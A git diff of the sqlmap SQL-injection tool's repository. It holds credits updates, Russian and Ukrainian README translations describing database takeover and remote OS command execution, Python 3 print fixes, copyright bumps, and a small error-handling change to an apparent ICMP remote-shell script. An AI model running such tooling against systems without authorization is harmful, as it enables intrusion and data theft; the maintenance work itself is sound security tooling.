* Added option `--sql-file` for setting file(s) holding SQL statements to be executed (in case of stacked SQLi).
|
||||||
* Added switch `--sqlmap-shell` to turn on interactive sqlmap shell prompt.
|
* Added switch `--sqlmap-shell` to turn on interactive sqlmap shell prompt.
|
||||||
|
|||||||
@@ -565,6 +565,9 @@ Efrain Torres, <et(at)metasploit.com>
|
|||||||
* for helping out to improve the Metasploit Framework sqlmap auxiliary module and for committing it on the Metasploit official subversion repository
|
* for helping out to improve the Metasploit Framework sqlmap auxiliary module and for committing it on the Metasploit official subversion repository
|
||||||
* for his great Metasploit WMAP Framework
|
* for his great Metasploit WMAP Framework
|
||||||
|
|
||||||
|
Jennifer Torres, <jtorresf42(at)gmail.com>
|
||||||
|
* for contributing a tamper script luanginx.py
|
||||||
|
|
||||||
Sandro Tosi, <matrixhasu(at)gmail.com>
|
Sandro Tosi, <matrixhasu(at)gmail.com>
|
||||||
* for helping to create sqlmap Debian package correctly
|
* for helping to create sqlmap Debian package correctly
|
||||||
|
|
||||||
@@ -597,6 +600,7 @@ Carlos Gabriel Vergara, <carlosgabrielvergara(at)gmail.com>
|
|||||||
|
|
||||||
Patrick Webster, <patrick(at)aushack.com>
|
Patrick Webster, <patrick(at)aushack.com>
|
||||||
* for suggesting an enhancement
|
* for suggesting an enhancement
|
||||||
|
* for donating to sqlmap development (from OSI.Security)
|
||||||
|
|
||||||
Ed Williams, <ed.williams(at)ngssecure.com>
|
Ed Williams, <ed.williams(at)ngssecure.com>
|
||||||
* for suggesting a minor enhancement
|
* for suggesting a minor enhancement
|
||||||
|
|||||||
50
doc/translations/README-ru-RUS.md
Normal file
50
doc/translations/README-ru-RUS.md
Normal file
@@ -0,0 +1,50 @@
|
|||||||
|
# sqlmap
|
||||||
|
|
||||||
|
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||||
|
|
||||||
|
sqlmap - это инструмент для тестирования уязвимостей с открытым исходным кодом, который автоматизирует процесс обнаружения и использования ошибок SQL-инъекций и захвата серверов баз данных. Он оснащен мощным механизмом обнаружения, множеством приятных функций для профессионального тестера уязвимостей и широким спектром скриптов, которые упрощают работу с базами данных, от сбора данных из базы данных, до доступа к базовой файловой системе и выполнения команд в операционной системе через out-of-band соединение.
|
||||||
|
|
||||||
|
Скриншоты
|
||||||
|
----
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
Вы можете посетить [набор скриншотов](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) демонстрируемые некоторые функции в wiki.
|
||||||
|
|
||||||
|
Установка
|
||||||
|
----
|
||||||
|
|
||||||
|
Вы можете скачать последнюю версию tarball, нажав [сюда](https://github.com/sqlmapproject/sqlmap/tarball/master) или последний zipball, нажав [сюда](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
||||||
|
|
||||||
|
Предпочтительно вы можете загрузить sqlmap, клонируя [Git](https://github.com/sqlmapproject/sqlmap) репозиторий:
|
||||||
|
|
||||||
|
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||||
|
|
||||||
|
sqlmap работает из коробки с [Python](http://www.python.org/download/) версии **2.6.x** и **2.7.x** на любой платформе.
|
||||||
|
|
||||||
|
Использование
|
||||||
|
----
|
||||||
|
|
||||||
|
Чтобы получить список основных опций и вариантов выбора, используйте:
|
||||||
|
|
||||||
|
python sqlmap.py -h
|
||||||
|
|
||||||
|
Чтобы получить список всех опций и вариантов выбора, используйте:
|
||||||
|
|
||||||
|
python sqlmap.py -hh
|
||||||
|
|
||||||
|
Вы можете найти пробный запуск [тут](https://asciinema.org/a/46601).
|
||||||
|
Чтобы получить обзор возможностей sqlmap, список поддерживаемых функций и описание всех параметров и переключателей, а также примеры, вам рекомендуется ознакомится с [пользовательским мануалом](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
|
||||||
|
|
||||||
|
Ссылки
|
||||||
|
----
|
||||||
|
|
||||||
|
* Основной сайт: http://sqlmap.org
|
||||||
|
* Скачивание: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) или [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||||
|
* Канал новостей RSS: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||||
|
* Отслеживание проблем: https://github.com/sqlmapproject/sqlmap/issues
|
||||||
|
* Пользовательский мануал: https://github.com/sqlmapproject/sqlmap/wiki
|
||||||
|
* Часто задаваемые вопросы (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||||
|
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||||
|
* Демки: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
|
||||||
|
* Скриншоты: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||||
50
doc/translations/README-uk-UA.md
Normal file
50
doc/translations/README-uk-UA.md
Normal file
@@ -0,0 +1,50 @@
|
|||||||
|
# sqlmap
|
||||||
|
|
||||||
|
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://badge.fury.io/py/sqlmap) [](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [](https://twitter.com/sqlmap)
|
||||||
|
|
||||||
|
sqlmap - це інструмент для тестування вразливостей з відкритим сирцевим кодом, який автоматизує процес виявлення і використання дефектів SQL-ін'єкцій, а також захоплення серверів баз даних. Він оснащений потужним механізмом виявлення, безліччю приємних функцій для професійного тестувальника вразливостей і широким спектром скриптів, які спрощують роботу з базами даних - від відбитка бази даних до доступу до базової файлової системи та виконання команд в операційній системі через out-of-band з'єднання.
|
||||||
|
|
||||||
|
Скриншоти
|
||||||
|
----
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
Ви можете ознайомитися з [колекцією скриншотів](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), які демонструють деякі функції в wiki.
|
||||||
|
|
||||||
|
Встановлення
|
||||||
|
----
|
||||||
|
|
||||||
|
Ви можете завантажити останню версію tarball натиснувши [сюди](https://github.com/sqlmapproject/sqlmap/tarball/master) або останню версію zipball натиснувши [сюди](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
||||||
|
|
||||||
|
Найкраще завантажити sqlmap шляхом клонування [Git](https://github.com/sqlmapproject/sqlmap) репозиторію:
|
||||||
|
|
||||||
|
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||||
|
|
||||||
|
sqlmap «працює з коробки» з [Python](http://www.python.org/download/) версії **2.6.x** та **2.7.x** на будь-якій платформі.
|
||||||
|
|
||||||
|
Використання
|
||||||
|
----
|
||||||
|
|
||||||
|
Щоб отримати список основних опцій і перемикачів, використовуйте:
|
||||||
|
|
||||||
|
python sqlmap.py -h
|
||||||
|
|
||||||
|
Щоб отримати список всіх опцій і перемикачів, використовуйте:
|
||||||
|
|
||||||
|
python sqlmap.py -hh
|
||||||
|
|
||||||
|
Ви можете знайти приклад виконання [тут](https://asciinema.org/a/46601).
|
||||||
|
Для того, щоб ознайомитися з можливостями sqlmap, списком підтримуваних функцій та описом всіх параметрів і перемикачів, а також прикладами, вам рекомендується скористатися [інструкцією користувача](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
|
||||||
|
|
||||||
|
Посилання
|
||||||
|
----
|
||||||
|
|
||||||
|
* Основний сайт: http://sqlmap.org
|
||||||
|
* Завантаження: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) або [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||||
|
* Канал новин RSS: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||||
|
* Відстеження проблем: https://github.com/sqlmapproject/sqlmap/issues
|
||||||
|
* Інструкція користувача: https://github.com/sqlmapproject/sqlmap/wiki
|
||||||
|
* Поширенні питання (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||||
|
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||||
|
* Демо: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
|
||||||
|
* Скриншоти: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|||||||
@@ -3,7 +3,7 @@
|
|||||||
"""
|
"""
|
||||||
beep.py - Make a beep sound
|
beep.py - Make a beep sound
|
||||||
|
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|||||||
@@ -3,10 +3,12 @@
|
|||||||
"""
|
"""
|
||||||
cloak.py - Simple file encryption/compression utility
|
cloak.py - Simple file encryption/compression utility
|
||||||
|
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
from __future__ import print_function
|
||||||
|
|
||||||
import os
|
import os
|
||||||
import sys
|
import sys
|
||||||
import zlib
|
import zlib
|
||||||
@@ -38,7 +40,7 @@ def decloak(inputFile=None, data=None):
|
|||||||
try:
|
try:
|
||||||
data = zlib.decompress(hideAscii(data))
|
data = zlib.decompress(hideAscii(data))
|
||||||
except:
|
except:
|
||||||
print 'ERROR: the provided input file \'%s\' does not contain valid cloaked content' % inputFile
|
print('ERROR: the provided input file \'%s\' does not contain valid cloaked content' % inputFile)
|
||||||
sys.exit(1)
|
sys.exit(1)
|
||||||
finally:
|
finally:
|
||||||
f.close()
|
f.close()
|
||||||
@@ -59,11 +61,11 @@ def main():
|
|||||||
if not args.inputFile:
|
if not args.inputFile:
|
||||||
parser.error('Missing the input file, -h for help')
|
parser.error('Missing the input file, -h for help')
|
||||||
|
|
||||||
except (OptionError, TypeError), e:
|
except (OptionError, TypeError) as ex:
|
||||||
parser.error(e)
|
parser.error(ex)
|
||||||
|
|
||||||
if not os.path.isfile(args.inputFile):
|
if not os.path.isfile(args.inputFile):
|
||||||
print 'ERROR: the provided input file \'%s\' is non existent' % args.inputFile
|
print('ERROR: the provided input file \'%s\' is non existent' % args.inputFile)
|
||||||
sys.exit(1)
|
sys.exit(1)
|
||||||
|
|
||||||
if not args.decrypt:
|
if not args.decrypt:
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|||||||
@@ -3,10 +3,12 @@
|
|||||||
"""
|
"""
|
||||||
dbgtool.py - Portable executable to ASCII debug script converter
|
dbgtool.py - Portable executable to ASCII debug script converter
|
||||||
|
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
from __future__ import print_function
|
||||||
|
|
||||||
import os
|
import os
|
||||||
import sys
|
import sys
|
||||||
import struct
|
import struct
|
||||||
@@ -19,7 +21,7 @@ def convert(inputFile):
|
|||||||
fileSize = fileStat.st_size
|
fileSize = fileStat.st_size
|
||||||
|
|
||||||
if fileSize > 65280:
|
if fileSize > 65280:
|
||||||
print "ERROR: the provided input file '%s' is too big for debug.exe" % inputFile
|
print("ERROR: the provided input file '%s' is too big for debug.exe" % inputFile)
|
||||||
sys.exit(1)
|
sys.exit(1)
|
||||||
|
|
||||||
script = "n %s\nr cx\n" % os.path.basename(inputFile.replace(".", "_"))
|
script = "n %s\nr cx\n" % os.path.basename(inputFile.replace(".", "_"))
|
||||||
@@ -59,7 +61,7 @@ def convert(inputFile):
|
|||||||
|
|
||||||
def main(inputFile, outputFile):
|
def main(inputFile, outputFile):
|
||||||
if not os.path.isfile(inputFile):
|
if not os.path.isfile(inputFile):
|
||||||
print "ERROR: the provided input file '%s' is not a regular file" % inputFile
|
print("ERROR: the provided input file '%s' is not a regular file" % inputFile)
|
||||||
sys.exit(1)
|
sys.exit(1)
|
||||||
|
|
||||||
script = convert(inputFile)
|
script = convert(inputFile)
|
||||||
@@ -70,7 +72,7 @@ def main(inputFile, outputFile):
|
|||||||
sys.stdout.write(script)
|
sys.stdout.write(script)
|
||||||
sys.stdout.close()
|
sys.stdout.close()
|
||||||
else:
|
else:
|
||||||
print script
|
print(script)
|
||||||
|
|
||||||
if __name__ == "__main__":
|
if __name__ == "__main__":
|
||||||
usage = "%s -i <input file> [-o <output file>]" % sys.argv[0]
|
usage = "%s -i <input file> [-o <output file>]" % sys.argv[0]
|
||||||
@@ -86,8 +88,8 @@ if __name__ == "__main__":
|
|||||||
if not args.inputFile:
|
if not args.inputFile:
|
||||||
parser.error("Missing the input file, -h for help")
|
parser.error("Missing the input file, -h for help")
|
||||||
|
|
||||||
except (OptionError, TypeError), e:
|
except (OptionError, TypeError) as ex:
|
||||||
parser.error(e)
|
parser.error(ex)
|
||||||
|
|
||||||
inputFile = args.inputFile
|
inputFile = args.inputFile
|
||||||
outputFile = args.outputFile
|
outputFile = args.outputFile
|
||||||
|
|||||||
@@ -80,7 +80,7 @@ def main(src, dst):
|
|||||||
cmd = ''
|
cmd = ''
|
||||||
|
|
||||||
# Wait for incoming replies
|
# Wait for incoming replies
|
||||||
if sock in select.select([ sock ], [], [])[0]:
|
if sock in select.select([sock], [], [])[0]:
|
||||||
buff = sock.recv(4096)
|
buff = sock.recv(4096)
|
||||||
|
|
||||||
if 0 == len(buff):
|
if 0 == len(buff):
|
||||||
@@ -125,8 +125,12 @@ def main(src, dst):
|
|||||||
# Have the IP packet contain the ICMP packet (along with its payload)
|
# Have the IP packet contain the ICMP packet (along with its payload)
|
||||||
ip.contains(icmp)
|
ip.contains(icmp)
|
||||||
|
|
||||||
# Send it to the target host
|
try:
|
||||||
sock.sendto(ip.get_packet(), (dst, 0))
|
# Send it to the target host
|
||||||
|
sock.sendto(ip.get_packet(), (dst, 0))
|
||||||
|
except socket.error as ex:
|
||||||
|
sys.stderr.write("'%s'\n" % ex)
|
||||||
|
sys.stderr.flush()
|
||||||
|
|
||||||
if __name__ == '__main__':
|
if __name__ == '__main__':
|
||||||
if len(sys.argv) < 3:
|
if len(sys.argv) < 3:
|
||||||
|
|||||||
@@ -1,137 +0,0 @@
|
|||||||
#!/usr/bin/env python
|
|
||||||
|
|
||||||
"""
|
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
|
||||||
See the file 'LICENSE' for copying permission
|
|
||||||
"""
|
|
||||||
|
|
||||||
import codecs
|
|
||||||
import os
|
|
||||||
import re
|
|
||||||
import urllib2
|
|
||||||
import urlparse
|
|
||||||
|
|
||||||
from xml.dom.minidom import Document
|
|
||||||
|
|
||||||
# Path to the XML file with signatures
|
|
||||||
MSSQL_XML = os.path.abspath("../../xml/banner/mssql.xml")
|
|
||||||
|
|
||||||
# Url to update Microsoft SQL Server XML versions file from
|
|
||||||
MSSQL_VERSIONS_URL = "http://www.sqlsecurity.com/FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx"
|
|
||||||
|
|
||||||
def updateMSSQLXML():
|
|
||||||
if not os.path.exists(MSSQL_XML):
|
|
||||||
errMsg = "[ERROR] file '%s' does not exist. Please run the script from its parent directory" % MSSQL_XML
|
|
||||||
print errMsg
|
|
||||||
return
|
|
||||||
|
|
||||||
infoMsg = "[INFO] retrieving data from '%s'" % MSSQL_VERSIONS_URL
|
|
||||||
print infoMsg
|
|
||||||
|
|
||||||
try:
|
|
||||||
req = urllib2.Request(MSSQL_VERSIONS_URL)
|
|
||||||
f = urllib2.urlopen(req)
|
|
||||||
mssqlVersionsHtmlString = f.read()
|
|
||||||
f.close()
|
|
||||||
except urllib2.URLError:
|
|
||||||
__mssqlPath = urlparse.urlsplit(MSSQL_VERSIONS_URL)
|
|
||||||
__mssqlHostname = __mssqlPath[1]
|
|
||||||
|
|
||||||
warnMsg = "[WARNING] sqlmap was unable to connect to %s," % __mssqlHostname
|
|
||||||
warnMsg += " check your Internet connection and retry"
|
|
||||||
print warnMsg
|
|
||||||
|
|
||||||
return
|
|
||||||
|
|
||||||
releases = re.findall("class=\"BCC_DV_01DarkBlueTitle\">SQL Server\s(.+?)\sBuilds", mssqlVersionsHtmlString, re.I)
|
|
||||||
releasesCount = len(releases)
|
|
||||||
|
|
||||||
# Create the minidom document
|
|
||||||
doc = Document()
|
|
||||||
|
|
||||||
# Create the <root> base element
|
|
||||||
root = doc.createElement("root")
|
|
||||||
doc.appendChild(root)
|
|
||||||
|
|
||||||
for index in xrange(0, releasesCount):
|
|
||||||
release = releases[index]
|
|
||||||
|
|
||||||
# Skip Microsoft SQL Server 6.5 because the HTML
|
|
||||||
# table is in another format
|
|
||||||
if release == "6.5":
|
|
||||||
continue
|
|
||||||
|
|
||||||
# Create the <signatures> base element
|
|
||||||
signatures = doc.createElement("signatures")
|
|
||||||
signatures.setAttribute("release", release)
|
|
||||||
root.appendChild(signatures)
|
|
||||||
|
|
||||||
startIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index])
|
|
||||||
|
|
||||||
if index == releasesCount - 1:
|
|
||||||
stopIdx = len(mssqlVersionsHtmlString)
|
|
||||||
else:
|
|
||||||
stopIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index + 1])
|
|
||||||
|
|
||||||
mssqlVersionsReleaseString = mssqlVersionsHtmlString[startIdx:stopIdx]
|
|
||||||
servicepackVersion = re.findall("</td><td>(7\.0|2000|2005|2008|2008 R2)*(.*?)</td><td.*?([\d\.]+)</td>[\r]*\n", mssqlVersionsReleaseString, re.I)
|
|
||||||
|
|
||||||
for servicePack, version in servicepackVersion:
|
|
||||||
if servicePack.startswith(" "):
|
|
||||||
servicePack = servicePack[1:]
|
|
||||||
if "/" in servicePack:
|
|
||||||
servicePack = servicePack[:servicePack.index("/")]
|
|
||||||
if "(" in servicePack:
|
|
||||||
servicePack = servicePack[:servicePack.index("(")]
|
|
||||||
if "-" in servicePack:
|
|
||||||
servicePack = servicePack[:servicePack.index("-")]
|
|
||||||
if "*" in servicePack:
|
|
||||||
servicePack = servicePack[:servicePack.index("*")]
|
|
||||||
if servicePack.startswith("+"):
|
|
||||||
servicePack = "0%s" % servicePack
|
|
||||||
|
|
||||||
servicePack = servicePack.replace("\t", " ")
|
|
||||||
servicePack = servicePack.replace("No SP", "0")
|
|
||||||
servicePack = servicePack.replace("RTM", "0")
|
|
||||||
servicePack = servicePack.replace("TM", "0")
|
|
||||||
servicePack = servicePack.replace("SP", "")
|
|
||||||
servicePack = servicePack.replace("Service Pack", "")
|
|
||||||
servicePack = servicePack.replace("<a href=\"http:", "")
|
|
||||||
servicePack = servicePack.replace(" ", " ")
|
|
||||||
servicePack = servicePack.replace("+ ", "+")
|
|
||||||
servicePack = servicePack.replace(" +", "+")
|
|
||||||
|
|
||||||
if servicePack.endswith(" "):
|
|
||||||
servicePack = servicePack[:-1]
|
|
||||||
|
|
||||||
if servicePack and version:
|
|
||||||
# Create the main <card> element
|
|
||||||
signature = doc.createElement("signature")
|
|
||||||
signatures.appendChild(signature)
|
|
||||||
|
|
||||||
# Create a <version> element
|
|
||||||
versionElement = doc.createElement("version")
|
|
||||||
signature.appendChild(versionElement)
|
|
||||||
|
|
||||||
# Give the <version> elemenet some text
|
|
||||||
versionText = doc.createTextNode(version)
|
|
||||||
versionElement.appendChild(versionText)
|
|
||||||
|
|
||||||
# Create a <servicepack> element
|
|
||||||
servicepackElement = doc.createElement("servicepack")
|
|
||||||
signature.appendChild(servicepackElement)
|
|
||||||
|
|
||||||
# Give the <servicepack> elemenet some text
|
|
||||||
servicepackText = doc.createTextNode(servicePack)
|
|
||||||
servicepackElement.appendChild(servicepackText)
|
|
||||||
|
|
||||||
# Save our newly created XML to the signatures file
|
|
||||||
mssqlXml = codecs.open(MSSQL_XML, "w", "utf8")
|
|
||||||
doc.writexml(writer=mssqlXml, addindent=" ", newl="\n")
|
|
||||||
mssqlXml.close()
|
|
||||||
|
|
||||||
infoMsg = "[INFO] done. retrieved data parsed and saved into '%s'" % MSSQL_XML
|
|
||||||
print infoMsg
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
updateMSSQLXML()
|
|
||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|||||||
@@ -3,10 +3,12 @@
|
|||||||
"""
|
"""
|
||||||
safe2bin.py - Simple safe(hex) to binary format converter
|
safe2bin.py - Simple safe(hex) to binary format converter
|
||||||
|
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
from __future__ import print_function
|
||||||
|
|
||||||
import binascii
|
import binascii
|
||||||
import re
|
import re
|
||||||
import string
|
import string
|
||||||
@@ -108,11 +110,11 @@ def main():
|
|||||||
if not args.inputFile:
|
if not args.inputFile:
|
||||||
parser.error('Missing the input file, -h for help')
|
parser.error('Missing the input file, -h for help')
|
||||||
|
|
||||||
except (OptionError, TypeError), e:
|
except (OptionError, TypeError) as ex:
|
||||||
parser.error(e)
|
parser.error(ex)
|
||||||
|
|
||||||
if not os.path.isfile(args.inputFile):
|
if not os.path.isfile(args.inputFile):
|
||||||
print 'ERROR: the provided input file \'%s\' is not a regular file' % args.inputFile
|
print('ERROR: the provided input file \'%s\' is not a regular file' % args.inputFile)
|
||||||
sys.exit(1)
|
sys.exit(1)
|
||||||
|
|
||||||
f = open(args.inputFile, 'r')
|
f = open(args.inputFile, 'r')
|
||||||
|
|||||||
@@ -1,10 +1,12 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
# Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
# Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
# See the file 'LICENSE' for copying permission
|
# See the file 'LICENSE' for copying permission
|
||||||
|
|
||||||
# Removes duplicate entries in wordlist like files
|
# Removes duplicate entries in wordlist like files
|
||||||
|
|
||||||
|
from __future__ import print_function
|
||||||
|
|
||||||
import sys
|
import sys
|
||||||
|
|
||||||
if len(sys.argv) > 0:
|
if len(sys.argv) > 0:
|
||||||
@@ -17,7 +19,7 @@ if len(sys.argv) > 0:
|
|||||||
str.encode(item)
|
str.encode(item)
|
||||||
if item in items:
|
if item in items:
|
||||||
if item:
|
if item:
|
||||||
print item
|
print(item)
|
||||||
else:
|
else:
|
||||||
items.append(item)
|
items.append(item)
|
||||||
except:
|
except:
|
||||||
|
|||||||
32
extra/shutils/newlines.py
Normal file
32
extra/shutils/newlines.py
Normal file
@@ -0,0 +1,32 @@
|
|||||||
|
#! /usr/bin/env python
|
||||||
|
|
||||||
|
# Runs pylint on all python scripts found in a directory tree
|
||||||
|
# Reference: http://rowinggolfer.blogspot.com/2009/08/pylint-recursively.html
|
||||||
|
|
||||||
|
from __future__ import print_function
|
||||||
|
|
||||||
|
import os
|
||||||
|
import sys
|
||||||
|
|
||||||
|
def check(filepath):
|
||||||
|
if filepath.endswith(".py"):
|
||||||
|
content = open(filepath, "rb").read()
|
||||||
|
|
||||||
|
if "\n\n\n" in content:
|
||||||
|
index = content.find("\n\n\n")
|
||||||
|
print(filepath, repr(content[index - 30:index + 30]))
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
try:
|
||||||
|
BASE_DIRECTORY = sys.argv[1]
|
||||||
|
except IndexError:
|
||||||
|
print("no directory specified, defaulting to current working directory")
|
||||||
|
BASE_DIRECTORY = os.getcwd()
|
||||||
|
|
||||||
|
print("looking for *.py scripts in subdirectories of '%s'" % BASE_DIRECTORY)
|
||||||
|
for root, dirs, files in os.walk(BASE_DIRECTORY):
|
||||||
|
if any(_ in root for _ in ("extra", "thirdparty")):
|
||||||
|
continue
|
||||||
|
for name in files:
|
||||||
|
filepath = os.path.join(root, name)
|
||||||
|
check(filepath)
|
||||||
@@ -1,7 +0,0 @@
|
|||||||
#!/bin/bash
|
|
||||||
|
|
||||||
# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
|
||||||
# See the file 'LICENSE' for copying permission
|
|
||||||
|
|
||||||
# Runs pep8 on all python files (prerequisite: apt-get install pep8)
|
|
||||||
find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pep8 '{}' \;
|
|
||||||
@@ -1,5 +1,15 @@
|
|||||||
#!/bin/bash
|
#!/bin/bash
|
||||||
|
|
||||||
|
: '
|
||||||
|
cat > .git/hooks/post-commit << EOF
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
source ./extra/shutils/postcommit-hook.sh
|
||||||
|
EOF
|
||||||
|
|
||||||
|
chmod +x .git/hooks/post-commit
|
||||||
|
'
|
||||||
|
|
||||||
SETTINGS="../../lib/core/settings.py"
|
SETTINGS="../../lib/core/settings.py"
|
||||||
|
|
||||||
declare -x SCRIPTPATH="${0}"
|
declare -x SCRIPTPATH="${0}"
|
||||||
|
|||||||
@@ -1,5 +1,15 @@
|
|||||||
#!/bin/bash
|
#!/bin/bash
|
||||||
|
|
||||||
|
: '
|
||||||
|
cat > .git/hooks/pre-commit << EOF
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
source ./extra/shutils/precommit-hook.sh
|
||||||
|
EOF
|
||||||
|
|
||||||
|
chmod +x .git/hooks/pre-commit
|
||||||
|
'
|
||||||
|
|
||||||
PROJECT="../../"
|
PROJECT="../../"
|
||||||
SETTINGS="../../lib/core/settings.py"
|
SETTINGS="../../lib/core/settings.py"
|
||||||
CHECKSUM="../../txt/checksum.md5"
|
CHECKSUM="../../txt/checksum.md5"
|
||||||
@@ -16,7 +26,7 @@ if [ -f $SETTINGS_FULLPATH ]
|
|||||||
then
|
then
|
||||||
LINE=$(grep -o ${SETTINGS_FULLPATH} -e 'VERSION = "[0-9.]*"')
|
LINE=$(grep -o ${SETTINGS_FULLPATH} -e 'VERSION = "[0-9.]*"')
|
||||||
declare -a LINE
|
declare -a LINE
|
||||||
INCREMENTED=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); _.append(0) if len(_) < 3 else _; _[-1] = str(int(_[-1]) + 1); month = str(time.gmtime().tm_mon); _[-1] = '0' if _[-2] != month else _[-1]; _[-2] = month; print sys.argv[1].replace(version, '.'.join(_))" "$LINE")
|
INCREMENTED=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); _.extend([0] * (4 - len(_))); _[-1] = str(int(_[-1]) + 1); month = str(time.gmtime().tm_mon); _[-1] = '0' if _[-2] != month else _[-1]; _[-2] = month; print sys.argv[1].replace(version, '.'.join(_))" "$LINE")
|
||||||
if [ -n "$INCREMENTED" ]
|
if [ -n "$INCREMENTED" ]
|
||||||
then
|
then
|
||||||
sed -i "s/${LINE}/${INCREMENTED}/" $SETTINGS_FULLPATH
|
sed -i "s/${LINE}/${INCREMENTED}/" $SETTINGS_FULLPATH
|
||||||
@@ -29,4 +39,4 @@ then
|
|||||||
fi
|
fi
|
||||||
|
|
||||||
truncate -s 0 "$CHECKSUM_FULLPATH"
|
